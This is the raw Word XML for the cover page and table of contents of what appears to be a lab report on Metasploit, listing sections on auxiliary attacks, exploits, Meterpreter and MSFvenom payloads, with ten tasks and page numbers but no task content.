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EAD8" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00886482">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886482" w:rsidRPr="001B3105" w14:paraId="1147A39D" w14:textId="77777777" w:rsidTr="00834D24">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:alias w:val="Company"/>
            <w:id w:val="13406915"/>
            <w:placeholder>
              <w:docPart w:val="1264145D91E547D6B4B41DA45D1CCA3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5954477E" w14:textId="41B8757E" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00834D24">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886482" w:rsidRPr="001B3105" w14:paraId="69F43AD4" w14:textId="77777777" w:rsidTr="00834D24">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98211AB81EA4441C877B7F926E2D5FFB"/>
              </w:placeholder>
              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
              <w:text/>
            </w:sdtPr>
            <w:sdtEndPr/>
            <w:sdtContent>
              <w:p w14:paraId="045C74A9" w14:textId="5357A19A" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00834D24">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2</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00886482" w:rsidRPr="001B3105" w14:paraId="6227F3AC" w14:textId="77777777" w:rsidTr="00834D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7672" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="216" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="216" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5981C323" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00834D24">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886482" w:rsidRPr="001B3105" w14:paraId="499F48EC" w14:textId="77777777" w:rsidTr="00834D24">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E46309CEE61040F78C3225BDC05C3C32"/>
              </w:placeholder>
              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
              <w:text/>
            </w:sdtPr>
            <w:sdtEndPr/>
            <w:sdtContent>
              <w:p w14:paraId="31BC0525" w14:textId="43B2DB09" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00834D24">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hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:alias w:val="Date"/>
              <w:tag w:val="Date"/>
              <w:id w:val="13406932"/>
              <w:placeholder>
                <w:docPart w:val="30559BED5F244700B18B6F5301F1D29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1E395B" w14:textId="2AA854DF" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00834D24">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:autoSpaceDE w:val="0"/>
                  <w:autoSpaceDN w:val="0"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                    <w:sz w:val="28"/>
                    <w:szCs w:val="28"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                    <w:sz w:val="28"/>
                    <w:szCs w:val="28"/>
                  </w:rPr>
                  <w:t>301180252</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:p w14:paraId="438B1487" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00834D24">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EBD6351" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00886482">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4298159C" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="001B3105" w:rsidRDefault="00886482" w:rsidP="00886482">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5F81CCD3" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="00834D24" w:rsidRDefault="00886482" w:rsidP="00886482">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47D73B5D" w14:textId="2B80EE9C" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00886482">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0508497" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 1: Auxiliary Attacks</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_Toc20508497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sidR="00E26171">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="270D430B" w14:textId="0CD49033" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508498" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 1:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508498 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42D1B1D2" w14:textId="65FB53F3" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508499" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 2: Exploits</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_Toc20508499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Pr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="019FA14E" w14:textId="5AB80C64" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508500" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 2:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508500 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63FBE2E8" w14:textId="29C3BA15" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508501" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 3:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508501 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="513CD99D" w14:textId="5D9CDEBC" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508502" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 4:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508502 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26754097" w14:textId="038B79C5" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508503" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 3: Meterpreter</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_Toc20508503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Pr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B3BB18D" w14:textId="42EF0D7B" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508504" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 5:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508504 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C17601D" w14:textId="59D9A7EF" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508505" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 6:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508505 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67CF15F8" w14:textId="0B7B5E35" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508506" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 7:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508506 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E8AB858" w14:textId="3D402E3A" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508507" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 8:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508507 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7ACEB4FF" w14:textId="6D2CDB18" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508508" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 4: Custom Payloads and MSFvenom</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_Toc20508508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Pr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6702A135" w14:textId="1F1EF7F8" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508509" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 9:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508509 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AEF50C8" w14:textId="7B8A3EBD" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508510" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 10:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508510 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79FB0363" w14:textId="6999E265" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508511" w:history="1">
